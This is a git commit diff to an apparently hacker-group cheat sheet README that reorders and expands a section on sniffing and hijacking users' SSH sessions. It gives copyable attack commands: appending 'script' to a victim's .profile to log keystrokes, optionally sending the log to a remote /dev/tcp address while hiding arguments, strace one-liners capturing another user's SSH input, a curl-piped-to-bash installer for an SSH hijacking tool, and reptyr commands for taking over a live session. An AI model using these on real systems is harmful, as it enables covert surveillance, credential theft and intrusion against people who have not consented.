mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 12:48:36 +02:00
Update README.md
This commit is contained in:
@@ -80,11 +80,12 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
|
||||
1. [cryptsetup](#crypto-filesystem)
|
||||
1. [EncFS](#encfs)
|
||||
1. [Encrypting a file](#encrypting-file)
|
||||
1. [Sniffing a user's SSH session](#ssh-sniffing)
|
||||
1. [with strace](#ssh-sniffing-strace)
|
||||
1. [with script](#ssh-sniffing-script)
|
||||
1. [with a wrapper script](#ssh-sniffing-wrapper)
|
||||
1. [with SSH-IT](#ssh-sniffing-sshit)
|
||||
1. [SSH session sniffing and hijaking](#ssh-sniffing)
|
||||
1. [Sniff a user's SHELL session with script](#ssh-sniffing-script)
|
||||
1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace)
|
||||
1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper)
|
||||
1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit)
|
||||
1. [Hijak / Take-over a running SSH session](#hijak)
|
||||
1. [VPN and Shells](#vpn-shell)
|
||||
1. [Disposable Root Servers](#shell)
|
||||
1. [VPN/VPS Providers](#vpn)
|
||||
@@ -1566,15 +1567,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I <input.txt.enc >input.
|
||||
---
|
||||
<a id="ssh-sniffing"></a>
|
||||
## 9. SSH Sniffing
|
||||
<a id="ssh-sniffing-strace"></a>
|
||||
**9.i Sniff a user's SSH session with strace**
|
||||
```sh
|
||||
strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
|
||||
```
|
||||
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
|
||||
|
||||
<a id="ssh-sniffing-script"></a>
|
||||
**9.ii Sniff a user's SSH session with script**
|
||||
**9.i Sniff a user's SHELL session with script**
|
||||
|
||||
A method to log the shell session of a user (who logged in via SSH).
|
||||
|
||||
The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in:
|
||||
```sh
|
||||
@@ -1582,10 +1578,18 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
|
||||
```
|
||||
Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
|
||||
|
||||
<a id="ssh-sniffing-wrapper"></a>
|
||||
**9.iii. Sniff a user's SSH session with a wrapper script**
|
||||
<a id="ssh-sniffing-strace"></a>
|
||||
**9.ii Sniff a user's outgoing SSH session with strace**
|
||||
```sh
|
||||
strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
|
||||
```
|
||||
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
|
||||
|
||||
Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0)
|
||||
|
||||
<a id="ssh-sniffing-wrapper"></a>
|
||||
**9.iii. Sniff a user's outgoing SSH session with a wrapper script**
|
||||
|
||||
Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions)
|
||||
|
||||
Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
|
||||
<details>
|
||||
@@ -1629,7 +1633,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m
|
||||
The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH.
|
||||
|
||||
<a id="ssh-sniffing-sshit"></a>
|
||||
**9.iv Sniff a user's SSH session using SSH-IT**
|
||||
**9.iv Sniff a user's outgoing SSH session using SSH-IT**
|
||||
|
||||
The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
|
||||
|
||||
@@ -1637,6 +1641,16 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i
|
||||
bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
|
||||
```
|
||||
|
||||
<a id="hijak"></a>
|
||||
**9.v Hijak / Take-over a running SSH session**
|
||||
|
||||
Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session:
|
||||
```sh
|
||||
ps alxww | grep ssh
|
||||
./reptyr <SSH PID>
|
||||
### or: ./reptyr $(pidof -s ssh)
|
||||
```
|
||||
|
||||
---
|
||||
<a id="vpn-shell"></a>
|
||||
## 10. VPN & Shells
|
||||
|
||||
Reference in New Issue
Block a user